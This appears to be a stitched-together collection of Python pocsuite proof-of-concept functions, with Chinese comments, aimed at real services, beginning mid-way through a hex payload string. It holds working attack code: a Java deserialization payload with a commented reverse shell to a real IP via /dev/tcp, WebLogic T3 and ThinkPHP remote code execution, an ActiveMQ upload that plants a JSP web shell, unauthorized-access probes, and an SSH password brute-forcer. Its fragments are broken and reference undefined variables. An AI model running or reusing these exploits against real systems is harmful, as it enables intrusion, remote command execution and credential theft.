1\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6e\x74\x72\x79\x53\x65\x74\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x78\x71\x00\x7e\x00\x4f' #print binascii.b2a_hex(payload_three).decode('hex') try: #执行的命令 payload_cmd = "whoami" #/bin/bash -i >& /dev/tcp/103.241.50.57/5210 0>&1 #转换为16进制 hex_tmp = payload_cmd.encode('hex') #x代表16进制,02 表示不足两位,前面补0输出 length_hex = "%02x" % (len(hex_tmp) / 2) #payload,数据包格式 jar包,长度,命令执行命令,jar包 send_payload = payload_one + length_hex + payload_cmd + payload_three # print repr(send_payload) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (_host, int(_port)) #print '[*]connecting to %s port %s' % server_address sock.connect(server_address) print '[**]sending payload...' sock.send(send_payload) #print u"存在漏洞" ''' result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = send_payload ''' # data = sock.recv(512) sock.close() except Exception, e: #print "error!" result = {}
def host_port(self, vul_url): import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "8080" #组装 http, https会出现问题 vul_url = "http://" + _host + ":" + _port return vul_url
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re import socket socket.setdefaulttimeout(2) from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = 9200 payload = 'http://%s:%s/' % (_host, _port) #检测漏洞 try: print payload response = requests.get(payload, timeout=2) print response.status_code if response.status_code == 200: print "check content" if response.content.find("You Know, for Search") >= 0: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = payload # else: # response = requests.get(payload.replace("9200","9207"),timeout=2) # print reponse.status_code # if response.status_code == 200: # print "check content" # if response.content.find("order") >= 0: # result['VerifyInfo'] = {} # result['VerifyInfo']['URL'] = _host # result['VerifyInfo']['Payload'] = payload except Exception, ex: print ex
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "6379" import socket payload = '\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' s = socket.socket() socket.setdefaulttimeout(1) #检测漏洞 try: s.connect((_host, int(_port))) s.send(payload) recvdata = s.recv(1024) #print recvdata if recvdata and 'redis_version' in recvdata: #print u'\n【警告】' + host + "【存在未授权访问】" result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = payload else: #print u'\n【不存在漏洞】 ' + host pass except: # return host pass s.close() print '[+]1 poc done' return self.save_output(result)
def _verify(self): result = {} output = Output(self) # ip ip = url2ip(self.url) #port import re _port = re.findall(':(\d+)\s*', self.url) if len(_port) != 0: _port = url2ip(self.url)[1] else: _port = 80 import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2.0) sock.connect((ip, int(_port))) # ip port flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" sock.send(flag) try: data = sock.recv(1024) if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = ip result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul' return self.save_output(result) except: print '连接失败' pass sock.close() # print '-' * 18 + '\n' print data
def _verify(self): #result是返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "8080" vul_ip = "http://%s:%s" % (_host, _port) print vul_ip try: response1 = req.get(url=vul_ip + "/script", timeout=5) response2 = req.get(url=vul_ip + "/ajaxBuildQueue", timeout=5) if (response1.status_code == 200 and "Jenkins.instance.pluginManager.plugins" in response1.text and response2.status_code == 200): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip else: response1 = req.get(url=vul_ip + "/jenkins/script", timeout=5) response2 = req.get(url=vul_ip + "/jenkins/ajaxBuildQueue", timeout=5) if (response1.status_code == 200 and "Jenkins.instance.pluginManager.plugins" in response1.text and response2.status_code == 200): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip except Exception, e: response = ""
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "2376" payload = "http://" + _host + ":" + _port + "/info" #:2376/containers/json #print payload #检测漏洞 try: #print u'\n【测试】' + host recvdata = req.get(url=payload, timeout=5).content #print recvdata if recvdata and 'docker' in recvdata: #print u'\n【警告】' + payload + "【存在未授权访问】" result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = payload result['VerifyInfo']['Payload'] = recvdata else: #print u'\n【不存在漏洞】 ' + payload pass except: # return payload pass print '[+]10 poc done' return self.save_output(result)
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "27017" test_url = str("http://" + _host + ":" + _port) #print vul_url try: response = req.get(url=test_url, timeout=5, allow_redirects=False).content #禁止重定向 except Exception, e: response = ""
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = 2181 payload = '\x65\x6e\x76\x69' #检测漏洞 import socket s = socket.socket() socket.setdefaulttimeout(5) try: s.connect((_host, _port)) s.send(payload) recvdata = s.recv(2048) # print recvdata if 'Environment' in recvdata: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload except Exception as e: # return host print e pass s.close() print '[+]27 poc done' return self.save_output(result)
def _verify(self): # 调用指纹方法 result = {} #如果设置端口则取端口,没有设置则为默认端口 import re import socket import time vul_url = "%s" % self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "7001" vul_ip = "http://%s:%s" % (_host, _port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(75) server_addr = (_host, int(_port)) t3_handshake(sock, server_addr) build_t3_request_object(sock, int(_port)) #payload="aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707736000a556e6963617374526566000d3131382e38392e35332e3133390000044b000000006ebc92c000000000000000000000000000000078" #payload=generate_payload() payload = "aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707736000a556e6963617374526566000d3131382e38392e35332e3133390000044bffffffffe355c3aa00000000000000000000000000000078" res = send_payload_objdata(sock, payload) p = re.findall('\\$Proxy[0-9]+', res, re.S) if (len(p) > 0): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = payload return self.save_output(result)
def _verify(self): result = {} vul_url = '%s' % self.url import re import time import ftplib from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = 80 vul_ip = "http://%s:%s" % (_host, _port) #判断端口是否开放 import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host, _port)) except Exception: return self.save_output(result) sk.close() try: url = vul_ip + "/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php" a = req.get(url).text if ("con_db_id" in a): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = url except Exception as e: pass return self.save_output(result)
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else : _host = url2ip(vul_url) _port = "8087" vul_host = _host + ":" + _port #print vul_host try: vul_result = self.poc(vul_host) except Exception, e: vul_result = False
def _verify(self): result = {} #获取漏洞url #如果设置端口则取端口,没有设置则为默认端口 import re vul_url = "%s" % self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "8080" vul_ip = "http://%s:%s" % (_host, _port) import hashlib # 会话保持 output = Output(self) file_name = "windows/win" BACKDIR_COUNT = 8 header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name} try: vulurl = vul_ip + '/plugin/credentials/.ini' vulurltest = req.get(vulurl, headers=header) if "MPEGVideo" in vulurltest.text: if vulurltest.text.find('version'): result['VerifyInfo'] = {} result['VerifyInfo']['url'] = vulurl result['VerifyInfo']['Payload'] = header except Exception as e: pass return self.save_output(result)
def _verify(self): # 调用指纹方法 result={} #如果设置端口则取端口,没有设置则为默认端口 import re import socket import time vul_url = "%s"%self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = int(url2ip(vul_url)[1]) else : _host = url2ip(vul_url) _port = 80 #判断端口是否开放. import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host,_port)) #print 'Server port is OK!' except Exception: return self.save_output(result) sk.close() vul_ip = "http://%s:%s" % (_host, _port) #url=vul_ip+"/public/index.php?s=captcha" #data={"_method":"__construct","filter[]":"system","method":"get","server[REQUEST_METHOD]":"ping%20t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org"} head={"Content-Type":"application/x-www-form-urlencoded"} url1 = vul_ip+"/public/index.php" #url1= "http://127.0.0.1/thinkphp/thinkphp_5.0.10_full/public/index.php" #data1 = {"c":"printf","f":"1234567890","_method":"filter"} data1 = {"c":"printf","f":"1234567890","_method":"filter"} try: text = requests.post(url=url1,data=data1,timeout=4).text if ("printf1234567890filter" in text or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text) : result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url1 result['VerifyInfo']['Payload'] = data1 return self.save_output(result) except Exception as e: pass url2 = vul_ip+"/index.php" data2 = {"c":"printf","f":"1234567890","method":"filter"} try: text = req.post(url2,data=data2,timeout=4).text if ("printf1234567890filter" in text or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: pass url3 = vul_ip+"/public/index.php?s=captcha" data3 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"} try: text = req.post(url3,data=data3,timeout=4).text if ("thinkphp/start.php" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: pass url4 = vul_ip+"/index.php?s=captcha" data4 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"} try: text = req.post(url4,data=data4,timeout=4).text if ("thinkphp/start.php" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: pass url5 = vul_ip+"/public/index.php" data5 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"} try: text = req.post(url5,data=data5,timeout=4).text if ("thinkphp/start.php" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: pass url6 = vul_ip+"/index.php" data6 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"} try: text = req.post(url6,data=data6,timeout=4).text if ("thinkphp/start.php" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: pass return self.save_output(result)
def _attack(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = '8161' #检测漏洞 url = 'http://%s:%s' % (_host, _port) # print url try: get_fileserver_path_url = url + '/fileserver/%08/..%08/.%08/%08' res = req.put(url=get_fileserver_path_url, timeout=5, allow_redirects=False) # print res.reason path = re.findall(r'/.*?(?=fileserver/.*)', res.reason)[0] # print path put_jsp_url = url + '/fileserver/haha.jsp' jsp_data = ''' <% if("sec".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %> ''' res = req.put(url=put_jsp_url, timeout=5, allow_redirects=False, data=jsp_data) if res.status_code == 204: # print 'ok' headers = {'Destination': 'file://' + path + 'admin/haha.jsp'} res = req.request('move', url=put_jsp_url, timeout=5, allow_redirects=False, headers=headers) if res.status_code == 204: # print 'ok' exploit_url = url + '/admin/haha.jsp?pwd=sec&i=id' res = req.get(url=exploit_url, timeout=5, allow_redirects=False) if 'uid' in res.text: id_info = re.findall(r'(?<=<pre>).*', res.text)[0] print id_info result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = exploit_url except Exception as e: print e return self.save_output(result)
def _verify(self): result = {} vul_url = '%s' % self.url import re import time import paramiko from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = int(url2ip(vul_url)[1]) else: _host = url2ip(vul_url) _port = 22 #判断端口是否开放 import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host, _port)) #print 'Server port is OK!' except Exception: return self.save_output(result) sk.close() flag = False payload = "弱口令" username = [ "root", "admin", ] password = [ "", "toor", "1234", "123456", "admin", "Admin", "ADMIN", "admin123", "Admin123", "root", "root123", "123.com" '123456', 'admin', 'root', 'password', '123123', '123', '1', '', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin', "1", "toor", "1234", "123456", "admin", "Admin", "ADMIN", "admin123", "Admin123", "root", "root123", "123.com", "ct123!@#" ] for u in username: for p in password: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: print p ssh.connect(hostname=_host, port=_port, username=u, password=p, timeout=1, allow_agent=False, look_for_keys=False) #执行命令 stdin, stdout, stderr = ssh.exec_command('whoami', timeout=1) #获取命令结果 resultname = stdout.read().split("\n")[0] if resultname == u: payload += str(u) + ":" + str(p) result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = payload ssh.close() except Exception, ex: ssh.close()